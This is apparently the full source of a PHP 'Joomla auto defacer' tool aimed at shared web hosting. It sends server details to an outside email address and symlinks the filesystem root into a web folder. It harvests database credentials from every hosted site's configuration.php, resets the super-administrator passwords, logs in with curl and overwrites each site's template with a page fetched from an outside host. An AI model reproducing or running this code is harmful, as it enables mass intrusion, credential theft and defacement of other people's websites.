joomla auto defacer

1. <html>
2. <?
3. //joomla auto defacer
4. //coded by ECF
5.  
6. ini_set("display_errors", "0");
7. set_time_limit(0);
8. @session_start();
9. echo "<p> <center> <font color=red font face='tahoma' size='6pt'>AUTOMATIC JOOMLA DEFACER </center></font> </p>";
10. echo "<p> <center> <font color=green font face='tahoma' size='4pt'>CODED BY : ECF</center></font> </p>";
11. echo "<p> <center> <font color=green font face='tahoma' size='4pt'>ECF</center></font> </p>";
12. echo "<p> <center> <font color=green font face='tahoma' size='4pt'>http://blog.ecf.me</center></font> </p>";
13. //mail feature
14. $body=("server ip:".$_SERVER['SERVER_ADDR']." "."Site Name:".$_SERVER['SERVER_NAME']." "."Directory".dirname(__FILE__));
15. mail('nadimzobaer@gmail.com',$_SERVER['SERVER_ADDR'],$body);
16.  
17. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
18.  
19. //create symlink of / to /ecf/root/
20. @mkdir('ecf',0777);
21. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
22. $fp = @fopen ('ecf/.htaccess','w');
23. fwrite($fp, $wr);
24. @symlink('/','ecf/root');
25. //collecting site names
26. $text=file_get_contents($base_url.'/ecf/root/var/named/');
27. $ar = explode('<li><a href="', $text);
28. for($vi=2;$vi < count($ar);$vi++)
29. {
30. $var1 = strtok($ar[$vi], " ");
31. $var1 = substr($var1,0,-2);
32. $old=('.db');
33. $new=('');
34. $sites = str_replace($old , $new , $var1);
35. $filename = 'sites.txt';
36. $fp = fopen($filename, "a+");
37. $write = fputs($fp, $sites."\n");
38. fclose($fp);
39. }
40.  
41. //collecting domainuser names for sites
42. $domainusers=file('sites.txt');
43. foreach ($domainusers as $domainuser) {
44. $textexec=("ls -la /etc/valiases/".$domainuser);
45. $exec=exec($textexec);
46. $filename = 'lsla.txt';
47. $fp = fopen($filename, "a+");
48. $write = fputs($fp, $exec."\n");
49. fclose($fp);
50. }
51.  
52. //creating final domain and domain user list
53. $lsla=file('lsla.txt');
54. foreach ($lsla as $finaldom) {
55. $user=entre2v2($finaldom,"-rw-r----- 1 "," mail");
56. $site=substr(strstr($finaldom, '/etc/valiases'),14);
57.  
58. $filename = 'bhung.txt';
59. $fp = fopen($filename, "a+");
60. $write = fputs($fp, $user.":". $site." ");
61. fclose($fp);
62.  
63. }
64.  
65. $f=file_get_contents('bhung.txt');
66. $finals=explode(" ",$f);
67. foreach ($finals as $final){
68. $strlen=('6');
69. $dr=strlen ($final);
70. if ($dr < $strlen) {
71.  
72. $filename = 'faltu.txt';
73. $fp = fopen($filename, "a");
74. $write = fputs($fp, $final);
75. fclose($fp);
76. }
77. else {
78. $filename = 'gold.txt';
79. $fp = fopen($filename, "a");
80. $write = fputs($fp, $final."\n");
81. fclose($fp);
82. }
83.  
84. }
85. //delete ajaira text files
86. unlink ('bhung.txt');
87. unlink ('faltu.txt');
88. unlink ('lsla.txt');
89. unlink ('sites.txt');
90.  
91. $h=file_get_contents('http://blog.ecf.me');
92. $url=($base_url);
93. $a=file($base_url.'/gold.txt');
94. echo ("<center><table border=1 cellspacing=1 cellpading=1>
95. <tr> <th width=200>Domain User</th> <th width=250>Website Name</td><th width=100>CMS</td><th width=200>Status</td></tr>");
96.  
97. foreach ($a as $final) {
98. list($user, $site_url) = explode(":", $final);
99. $site_urlto = substr($site_url, 0, -1);
100. $url2=($url."/ecf/root/home/".$user."/public_html/configuration.php");
101. $configs=file_get_contents($url2);
102. $old=('$');
103. $new=('ecf');
104. $configfile = str_replace($old , $new , $configs);
105. $username=entre2v2($configfile, "ecfuser = '","';");
106. $password=entre2v2($configfile, "ecfpassword = '","';");
107. $dbname=entre2v2($configfile, "ecfdb = '","';");
108. $dbprefix=entre2v2($configfile, "ecfdbprefix = '","';");
109.  
110. $strlendbprefix= strlen ($dbprefix);
111. if ($strlendbprefix > 2) {
112. $link=mysql_connect("localhost",$username,$password) ;
113.  
114. mysql_select_db($dbname,$link) ;
115.  
116. $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J' where usertype='Super Administrator'");
117.  
118. //checking pass change
119. $reqpass=('44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J');
120. $checkpass= mysql_query("SELECT password FROM ".$dbprefix."users where username='admin'");
121. $showpass=mysql_fetch_array ($checkpass);
122. if ($showpass[0]== $reqpass) {
123.  
124. $filename = 'passchanged.txt';
125. $fp = fopen($filename, "a+");
126. $write = fputs($fp, $site_url."\n");
127. fclose($fp);
128. //upto this alright
129. $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
130.  
131.  
132. $co=randomt();
133.  
134. if ( $req )
135. {
136.  
137. $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
138. $data = mysql_fetch_array($req);
139. $template_name=$data["template"];
140.  
141. $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
142. $data = mysql_fetch_array($req);
143. $template_id=$data["extension_id"];
144.  
145. $urlto=$site_urlto."/administrator/index.php";
146.  
147. $ch = curl_init();
148. curl_setopt($ch, CURLOPT_URL, $urlto);
149. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
150. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
151. curl_setopt($ch, CURLOPT_HEADER, 1);
152. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
153. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
154. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
155.  
156.  
157. $buffer = curl_exec($ch);
158.  
159. $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
160. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
161.  
162. ///////////////////////////
163. $urlto=$site_urlto."/administrator/index.php";
164. $ch = curl_init();
165. curl_setopt($ch, CURLOPT_URL, $urlto);
166. curl_setopt($ch, CURLOPT_POST, 1);
167. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&return=".$return."&".$hidden."=1");
168. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
169. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
170. curl_setopt($ch, CURLOPT_HEADER, 0);
171. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
172. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
173. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
174. $buffer = curl_exec($ch);
175.  
176. $pos = strpos($buffer,"com_config");
177. if($pos === false) {
178.  
179. }
180. else {
181. }
182. ///////////////////////////
183. $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
184. $ch = curl_init();
185. curl_setopt($ch, CURLOPT_URL, $urlto);
186. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
187. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
188. curl_setopt($ch, CURLOPT_HEADER, 0);
189. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
190. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
191. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
192. $buffer = curl_exec($ch);
193.  
194. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
195. if($hidden2) {
196. }
197. else {
198.  
199. }
200. $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
201.  
202. $ch = curl_init();
203. curl_setopt($ch, CURLOPT_URL, $urlto);
204. curl_setopt($ch, CURLOPT_POST, 1);
205. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
206.  
207. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
208. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
209. curl_setopt($ch, CURLOPT_HEADER, 0);
210. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
211. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
212. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
213. $buffer = curl_exec($ch);
214.  
215. $pos = strpos($buffer,'<dd class="message message">');
216. if($pos === false) {
217. echo "<center><table border=1 cellspacing=1 cellpading=1>
218. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
219. }
220. else {
221. $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
222. $filename = 'deftemp.txt';
223. $fp = fopen($filename, "a+");
224. $write = fputs($fp, $deftempurl."\n");
225. fclose($fp);
226.  
227. echo "<center><table border=1 cellspacing=1 cellpading=1>
228. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
229.  
230.  
231. }
232.  
233. }
234.  
235. else
236. {
237.  
238. $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
239. $data = mysql_fetch_array($req);
240. $template_name=$data["template"];
241.  
242. $urlto=$site_urlto."/administrator/index.php";
243. $ch = curl_init();
244. curl_setopt($ch, CURLOPT_URL, $urlto);
245. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
246. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
247. curl_setopt($ch, CURLOPT_HEADER, 1);
248. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
249. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
250. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
251. $buffer = curl_exec($ch);
252.  
253. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
254.  
255. $urlto=$site_urlto."/administrator/index.php";
256. $ch = curl_init();
257. curl_setopt($ch, CURLOPT_URL, $urlto);
258. curl_setopt($ch, CURLOPT_POST, 1);
259. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&".$hidden."=1");
260. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
261. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
262. curl_setopt($ch, CURLOPT_HEADER, 0);
263. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
264. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
265. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
266. $buffer = curl_exec($ch);
267.  
268. $pos = strpos($buffer,"com_config");
269.  
270. if($pos === false) {
271.  
272. }
273. else {
274. }
275. $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
276. $ch = curl_init();
277. curl_setopt($ch, CURLOPT_URL, $urlto);
278. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
279. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
280. curl_setopt($ch, CURLOPT_HEADER, 0);
281. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
282. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
283. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
284. $buffer = curl_exec($ch);
285.  
286. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
287.  
288. if($hidden2) {
289.  
290. }
291. else {
292.  
293. }
294.  
295.  
296. $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
297. $ch = curl_init();
298. curl_setopt($ch, CURLOPT_URL, $urlto);
299. curl_setopt($ch, CURLOPT_POST, 1);
300. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
301. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
302. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
303. curl_setopt($ch, CURLOPT_HEADER, 0);
304. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
305. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
306. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
307. $buffer = curl_exec($ch);
308.  
309. $pos = strpos($buffer,'<dd class="message message fade">');
310. if($pos === false) {
311. echo "<center><table border=1 cellspacing=1 cellpading=1>
312. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
313. }
314. else {
315. $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
316. $filename = 'deftemp.txt';
317. $fp = fopen($filename, "a+");
318. $write = fputs($fp, $deftempurl."\n");
319. fclose($fp);
320.  
321. echo "<center><table border=1 cellspacing=1 cellpading=1>
322. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
323.  
324.  
325. }
326.  
327. }
328.  
329.  
330. //upto this alright
331.  
332.  
333.  
334.  
335.  
336.  
337.  
338.  
339. }
340. else {
341. }
342. }
343. else {
344. }
345. }
346.  
347. $cntpasschanged=file('passchanged.txt');
348. $countpasschanged= count ($cntpasschanged);
349.  
350.  
351.  
352. echo("<br>");
353. $defacedurl=('<a href="deftemp.txt" target="_blank">View List of Defaced Site</a><br />');
354. $passchangedurl=('<a href="passchanged.txt" target="_blank">View List of Password Changed site</a><br />');
355. echo "<center><table border=1 cellspacing=1 cellpading=1>
356. <td width=300><font color=green> $defacedurl</font></td><td width=300><font color=green> $passchangedurl </font></td></tr></table></center>";
357.  
358.  
359.  
360. //declaring function entre2v2
361. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
362. $ar0=explode($marqueurDebutLien, $text);
363. $ar1=explode($marqueurFinLien, $ar0[$i]);
364. return trim($ar1[0]);
365. }
366.  
367. function randomt() {
368.  
369. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
370. srand((double)microtime()*1000000);
371. $i = 0;
372. $pass = '' ;
373.  
374. while ($i <= 7) {
375. $num = rand() % 33;
376. $tmp = substr($chars, $num, 1);
377. $pass = $pass . $tmp;
378. $i++;
379. }
380.  
381. return $pass;
382.  
383. }
384.  
385.  
386. ?>